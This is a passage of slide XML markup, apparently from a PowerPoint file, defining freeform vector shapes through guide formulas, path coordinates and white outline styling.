                  <a:gd name="T37" fmla="*/ 7 h 25"/>
                  <a:gd name="T38" fmla="*/ 34 w 47"/>
                  <a:gd name="T39" fmla="*/ 6 h 25"/>
                  <a:gd name="T40" fmla="*/ 31 w 47"/>
                  <a:gd name="T41" fmla="*/ 5 h 25"/>
                  <a:gd name="T42" fmla="*/ 29 w 47"/>
                  <a:gd name="T43" fmla="*/ 4 h 25"/>
                  <a:gd name="T44" fmla="*/ 27 w 47"/>
                  <a:gd name="T45" fmla="*/ 3 h 25"/>
                  <a:gd name="T46" fmla="*/ 25 w 47"/>
                  <a:gd name="T47" fmla="*/ 3 h 25"/>
                  <a:gd name="T48" fmla="*/ 25 w 47"/>
                  <a:gd name="T49" fmla="*/ 2 h 25"/>
                  <a:gd name="T50" fmla="*/ 24 w 47"/>
                  <a:gd name="T51" fmla="*/ 0 h 25"/>
                  <a:gd name="T52" fmla="*/ 24 w 47"/>
                  <a:gd name="T53" fmla="*/ 1 h 25"/>
                  <a:gd name="T54" fmla="*/ 21 w 47"/>
                  <a:gd name="T55" fmla="*/ 2 h 25"/>
                  <a:gd name="T56" fmla="*/ 22 w 47"/>
                  <a:gd name="T57" fmla="*/ 4 h 25"/>
                  <a:gd name="T58" fmla="*/ 22 w 47"/>
                  <a:gd name="T59" fmla="*/ 5 h 25"/>
                  <a:gd name="T60" fmla="*/ 20 w 47"/>
                  <a:gd name="T61" fmla="*/ 6 h 25"/>
                  <a:gd name="T62" fmla="*/ 22 w 47"/>
                  <a:gd name="T63" fmla="*/ 9 h 25"/>
                  <a:gd name="T64" fmla="*/ 21 w 47"/>
                  <a:gd name="T65" fmla="*/ 12 h 25"/>
                  <a:gd name="T66" fmla="*/ 18 w 47"/>
                  <a:gd name="T67" fmla="*/ 13 h 25"/>
                  <a:gd name="T68" fmla="*/ 15 w 47"/>
                  <a:gd name="T69" fmla="*/ 13 h 25"/>
                  <a:gd name="T70" fmla="*/ 4 w 47"/>
                  <a:gd name="T71" fmla="*/ 12 h 25"/>
                  <a:gd name="T72" fmla="*/ 1 w 47"/>
                  <a:gd name="T73" fmla="*/ 12 h 25"/>
                  <a:gd name="T74" fmla="*/ 0 w 47"/>
                  <a:gd name="T75" fmla="*/ 15 h 25"/>
                  <a:gd name="T76" fmla="*/ 0 w 47"/>
                  <a:gd name="T77" fmla="*/ 21 h 25"/>
                  <a:gd name="T78" fmla="*/ 0 w 47"/>
                  <a:gd name="T79" fmla="*/ 21 h 25"/>
                  <a:gd name="T80" fmla="*/ 1 w 47"/>
                  <a:gd name="T81" fmla="*/ 19 h 25"/>
                  <a:gd name="T82" fmla="*/ 2 w 47"/>
                  <a:gd name="T83" fmla="*/ 21 h 25"/>
                  <a:gd name="T84" fmla="*/ 5 w 47"/>
                  <a:gd name="T85" fmla="*/ 20 h 25"/>
                  <a:gd name="T86" fmla="*/ 7 w 47"/>
                  <a:gd name="T87" fmla="*/ 20 h 25"/>
                  <a:gd name="T88" fmla="*/ 5 w 47"/>
                  <a:gd name="T89" fmla="*/ 21 h 25"/>
                  <a:gd name="T90" fmla="*/ 2 w 47"/>
                  <a:gd name="T91" fmla="*/ 24 h 25"/>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47"/>
                  <a:gd name="T139" fmla="*/ 0 h 25"/>
                  <a:gd name="T140" fmla="*/ 47 w 47"/>
                  <a:gd name="T141" fmla="*/ 25 h 25"/>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47" h="25">
                    <a:moveTo>
                      <a:pt x="2" y="24"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="24"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36275" name="Freeform 7"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4986" y="1936"/>
                <a:ext cx="46" cy="187"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 46"/>
                  <a:gd name="T1" fmla="*/ 0 h 187"/>
                  <a:gd name="T2" fmla="*/ 10 w 46"/>
                  <a:gd name="T3" fmla="*/ 6 h 187"/>
                  <a:gd name="T4" fmla="*/ 5 w 46"/>
                  <a:gd name="T5" fmla="*/ 6 h 187"/>
                  <a:gd name="T6" fmla="*/ 3 w 46"/>
                  <a:gd name="T7" fmla="*/ 7 h 187"/>
                  <a:gd name="T8" fmla="*/ 1 w 46"/>
                  <a:gd name="T9" fmla="*/ 10 h 187"/>
                  <a:gd name="T10" fmla="*/ 4 w 46"/>
                  <a:gd name="T11" fmla="*/ 15 h 187"/>
                  <a:gd name="T12" fmla="*/ 3 w 46"/>
                  <a:gd name="T13" fmla="*/ 24 h 187"/>
                  <a:gd name="T14" fmla="*/ 1 w 46"/>
                  <a:gd name="T15" fmla="*/ 32 h 187"/>
                  <a:gd name="T16" fmla="*/ 0 w 46"/>
                  <a:gd name="T17" fmla="*/ 34 h 187"/>
                  <a:gd name="T18" fmla="*/ 1 w 46"/>
                  <a:gd name="T19" fmla="*/ 45 h 187"/>
                  <a:gd name="T20" fmla="*/ 7 w 46"/>
                  <a:gd name="T21" fmla="*/ 55 h 187"/>
                  <a:gd name="T22" fmla="*/ 8 w 46"/>
                  <a:gd name="T23" fmla="*/ 60 h 187"/>
                  <a:gd name="T24" fmla="*/ 9 w 46"/>
                  <a:gd name="T25" fmla="*/ 68 h 187"/>
                  <a:gd name="T26" fmla="*/ 8 w 46"/>
                  <a:gd name="T27" fmla="*/ 83 h 187"/>
                  <a:gd name="T28" fmla="*/ 8 w 46"/>
                  <a:gd name="T29" fmla="*/ 98 h 187"/>
                  <a:gd name="T30" fmla="*/ 7 w 46"/>
                  <a:gd name="T31" fmla="*/ 106 h 187"/>
                  <a:gd name="T32" fmla="*/ 5 w 46"/>
                  <a:gd name="T33" fmla="*/ 116 h 187"/>
                  <a:gd name="T34" fmla="*/ 2 w 46"/>
                  <a:gd name="T35" fmla="*/ 119 h 187"/>
                  <a:gd name="T36" fmla="*/ 3 w 46"/>
                  <a:gd name="T37" fmla="*/ 122 h 187"/>
                  <a:gd name="T38" fmla="*/ 4 w 46"/>
                  <a:gd name="T39" fmla="*/ 128 h 187"/>
                  <a:gd name="T40" fmla="*/ 6 w 46"/>
                  <a:gd name="T41" fmla="*/ 132 h 187"/>
                  <a:gd name="T42" fmla="*/ 7 w 46"/>
                  <a:gd name="T43" fmla="*/ 140 h 187"/>
                  <a:gd name="T44" fmla="*/ 3 w 46"/>
                  <a:gd name="T45" fmla="*/ 146 h 187"/>
                  <a:gd name="T46" fmla="*/ 2 w 46"/>
                  <a:gd name="T47" fmla="*/ 151 h 187"/>
                  <a:gd name="T48" fmla="*/ 5 w 46"/>
                  <a:gd name="T49" fmla="*/ 160 h 187"/>
                  <a:gd name="T50" fmla="*/ 0 w 46"/>
                  <a:gd name="T51" fmla="*/ 172 h 187"/>
                  <a:gd name="T52" fmla="*/ 2 w 46"/>
                  <a:gd name="T53" fmla="*/ 182 h 187"/>
                  <a:gd name="T54" fmla="*/ 5 w 46"/>
                  <a:gd name="T55" fmla="*/ 187 h 187"/>
                  <a:gd name="T56" fmla="*/ 9 w 46"/>
                  <a:gd name="T57" fmla="*/ 178 h 187"/>
                  <a:gd name="T58" fmla="*/ 11 w 46"/>
                  <a:gd name="T59" fmla="*/ 172 h 187"/>
                  <a:gd name="T60" fmla="*/ 14 w 46"/>
                  <a:gd name="T61" fmla="*/ 169 h 187"/>
                  <a:gd name="T62" fmla="*/ 16 w 46"/>
                  <a:gd name="T63" fmla="*/ 169 h 187"/>
                  <a:gd name="T64" fmla="*/ 22 w 46"/>
                  <a:gd name="T65" fmla="*/ 172 h 187"/>
                  <a:gd name="T66" fmla="*/ 27 w 46"/>
                  <a:gd name="T67" fmla="*/ 185 h 187"/>
                  <a:gd name="T68" fmla="*/ 29 w 46"/>
                  <a:gd name="T69" fmla="*/ 172 h 187"/>
                  <a:gd name="T70" fmla="*/ 26 w 46"/>
                  <a:gd name="T71" fmla="*/ 165 h 187"/>
                  <a:gd name="T72" fmla="*/ 22 w 46"/>
                  <a:gd name="T73" fmla="*/ 163 h 187"/>
                  <a:gd name="T74" fmla="*/ 17 w 46"/>
                  <a:gd name="T75" fmla="*/ 154 h 187"/>
                  <a:gd name="T76" fmla="*/ 16 w 46"/>
                  <a:gd name="T77" fmla="*/ 151 h 187"/>
                  <a:gd name="T78" fmla="*/ 14 w 46"/>
                  <a:gd name="T79" fmla="*/ 141 h 187"/>
                  <a:gd name="T80" fmla="*/ 15 w 46"/>
                  <a:gd name="T81" fmla="*/ 135 h 187"/>
                  <a:gd name="T82" fmla="*/ 16 w 46"/>
                  <a:gd name="T83" fmla="*/ 123 h 187"/>
                  <a:gd name="T84" fmla="*/ 20 w 46"/>
                  <a:gd name="T85" fmla="*/ 112 h 187"/>
                  <a:gd name="T86" fmla="*/ 23 w 46"/>
                  <a:gd name="T87" fmla="*/ 110 h 187"/>
                  <a:gd name="T88" fmla="*/ 24 w 46"/>
                  <a:gd name="T89" fmla="*/ 109 h 187"/>
                  <a:gd name="T90" fmla="*/ 32 w 46"/>
                  <a:gd name="T91" fmla="*/ 109 h 187"/>
                  <a:gd name="T92" fmla="*/ 37 w 46"/>
                  <a:gd name="T93" fmla="*/ 113 h 187"/>
                  <a:gd name="T94" fmla="*/ 46 w 46"/>
                  <a:gd name="T95" fmla="*/ 121 h 187"/>
                  <a:gd name="T96" fmla="*/ 39 w 46"/>
                  <a:gd name="T97" fmla="*/ 102 h 187"/>
                  <a:gd name="T98" fmla="*/ 32 w 46"/>
                  <a:gd name="T99" fmla="*/ 85 h 187"/>
                  <a:gd name="T100" fmla="*/ 27 w 46"/>
                  <a:gd name="T101" fmla="*/ 68 h 187"/>
                  <a:gd name="T102" fmla="*/ 23 w 46"/>
                  <a:gd name="T103" fmla="*/ 59 h 187"/>
                  <a:gd name="T104" fmla="*/ 21 w 46"/>
                  <a:gd name="T105" fmla="*/ 50 h 187"/>
                  <a:gd name="T106" fmla="*/ 21 w 46"/>
                  <a:gd name="T107" fmla="*/ 41 h 187"/>
                  <a:gd name="T108" fmla="*/ 23 w 46"/>
                  <a:gd name="T109" fmla="*/ 32 h 187"/>
                  <a:gd name="T110" fmla="*/ 24 w 46"/>
                  <a:gd name="T111" fmla="*/ 27 h 187"/>
                  <a:gd name="T112" fmla="*/ 24 w 46"/>
                  <a:gd name="T113" fmla="*/ 18 h 187"/>
                  <a:gd name="T114" fmla="*/ 23 w 46"/>
                  <a:gd name="T115" fmla="*/ 12 h 187"/>
                  <a:gd name="T116" fmla="*/ 20 w 46"/>
                  <a:gd name="T117" fmla="*/ 5 h 187"/>
                  <a:gd name="T118" fmla="*/ 17 w 46"/>
                  <a:gd name="T119" fmla="*/ 0 h 187"/>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46"/>
                  <a:gd name="T181" fmla="*/ 0 h 187"/>
                  <a:gd name="T182" fmla="*/ 46 w 46"/>
                  <a:gd name="T183" fmla="*/ 187 h 187"/>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46" h="187">
                    <a:moveTo>
                      <a:pt x="17" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36276" name="Freeform 8"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3596" y="977"/>
                <a:ext cx="237" cy="222"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 237"/>
                  <a:gd name="T1" fmla="*/ 215 h 222"/>
                  <a:gd name="T2" fmla="*/ 60 w 237"/>
                  <a:gd name="T3" fmla="*/ 190 h 222"/>
                  <a:gd name="T4" fmla="*/ 58 w 237"/>
                  <a:gd name="T5" fmla="*/ 175 h 222"/>
                  <a:gd name="T6" fmla="*/ 66 w 237"/>
                  <a:gd name="T7" fmla="*/ 181 h 222"/>
                  <a:gd name="T8" fmla="*/ 77 w 237"/>
                  <a:gd name="T9" fmla="*/ 163 h 222"/>
                  <a:gd name="T10" fmla="*/ 74 w 237"/>
                  <a:gd name="T11" fmla="*/ 150 h 222"/>
                  <a:gd name="T12" fmla="*/ 91 w 237"/>
                  <a:gd name="T13" fmla="*/ 147 h 222"/>
                  <a:gd name="T14" fmla="*/ 102 w 237"/>
                  <a:gd name="T15" fmla="*/ 136 h 222"/>
                  <a:gd name="T16" fmla="*/ 100 w 237"/>
                  <a:gd name="T17" fmla="*/ 124 h 222"/>
                  <a:gd name="T18" fmla="*/ 109 w 237"/>
                  <a:gd name="T19" fmla="*/ 111 h 222"/>
                  <a:gd name="T20" fmla="*/ 137 w 237"/>
                  <a:gd name="T21" fmla="*/ 95 h 222"/>
                  <a:gd name="T22" fmla="*/ 168 w 237"/>
                  <a:gd name="T23" fmla="*/ 79 h 222"/>
                  <a:gd name="T24" fmla="*/ 218 w 237"/>
                  <a:gd name="T25" fmla="*/ 52 h 222"/>
                  <a:gd name="T26" fmla="*/ 231 w 237"/>
                  <a:gd name="T27" fmla="*/ 37 h 222"/>
                  <a:gd name="T28" fmla="*/ 236 w 237"/>
                  <a:gd name="T29" fmla="*/ 12 h 222"/>
                  <a:gd name="T30" fmla="*/ 229 w 237"/>
                  <a:gd name="T31" fmla="*/ 0 h 222"/>
                  <a:gd name="T32" fmla="*/ 197 w 237"/>
                  <a:gd name="T33" fmla="*/ 7 h 222"/>
                  <a:gd name="T34" fmla="*/ 189 w 237"/>
                  <a:gd name="T35" fmla="*/ 29 h 222"/>
                  <a:gd name="T36" fmla="*/ 160 w 237"/>
                  <a:gd name="T37" fmla="*/ 40 h 222"/>
                  <a:gd name="T38" fmla="*/ 139 w 237"/>
                  <a:gd name="T39" fmla="*/ 51 h 222"/>
                  <a:gd name="T40" fmla="*/ 124 w 237"/>
                  <a:gd name="T41" fmla="*/ 44 h 222"/>
                  <a:gd name="T42" fmla="*/ 116 w 237"/>
                  <a:gd name="T43" fmla="*/ 47 h 222"/>
                  <a:gd name="T44" fmla="*/ 105 w 237"/>
                  <a:gd name="T45" fmla="*/ 70 h 222"/>
                  <a:gd name="T46" fmla="*/ 86 w 237"/>
                  <a:gd name="T47" fmla="*/ 72 h 222"/>
                  <a:gd name="T48" fmla="*/ 72 w 237"/>
                  <a:gd name="T49" fmla="*/ 84 h 222"/>
                  <a:gd name="T50" fmla="*/ 59 w 237"/>
                  <a:gd name="T51" fmla="*/ 108 h 222"/>
                  <a:gd name="T52" fmla="*/ 51 w 237"/>
                  <a:gd name="T53" fmla="*/ 106 h 222"/>
                  <a:gd name="T54" fmla="*/ 37 w 237"/>
                  <a:gd name="T55" fmla="*/ 134 h 222"/>
                  <a:gd name="T56" fmla="*/ 42 w 237"/>
                  <a:gd name="T57" fmla="*/ 145 h 222"/>
                  <a:gd name="T58" fmla="*/ 31 w 237"/>
                  <a:gd name="T59" fmla="*/ 150 h 222"/>
                  <a:gd name="T60" fmla="*/ 26 w 237"/>
                  <a:gd name="T61" fmla="*/ 161 h 222"/>
                  <a:gd name="T62" fmla="*/ 30 w 237"/>
                  <a:gd name="T63" fmla="*/ 180 h 222"/>
                  <a:gd name="T64" fmla="*/ 14 w 237"/>
                  <a:gd name="T65" fmla="*/ 182 h 222"/>
                  <a:gd name="T66" fmla="*/ 0 w 237"/>
                  <a:gd name="T67" fmla="*/ 201 h 222"/>
                  <a:gd name="T68" fmla="*/ 11 w 237"/>
                  <a:gd name="T69" fmla="*/ 216 h 222"/>
                  <a:gd name="T70" fmla="*/ 23 w 237"/>
                  <a:gd name="T71" fmla="*/ 211 h 222"/>
                  <a:gd name="T72" fmla="*/ 36 w 237"/>
                  <a:gd name="T73" fmla="*/ 213 h 222"/>
                  <a:gd name="T74" fmla="*/ 47 w 237"/>
                  <a:gd name="T75" fmla="*/ 222 h 222"/>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37"/>
                  <a:gd name="T115" fmla="*/ 0 h 222"/>
                  <a:gd name="T116" fmla="*/ 237 w 237"/>
                  <a:gd name="T117" fmla="*/ 222 h 222"/>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37" h="222">
                    <a:moveTo>
                      <a:pt x="47" y="222"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="53" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
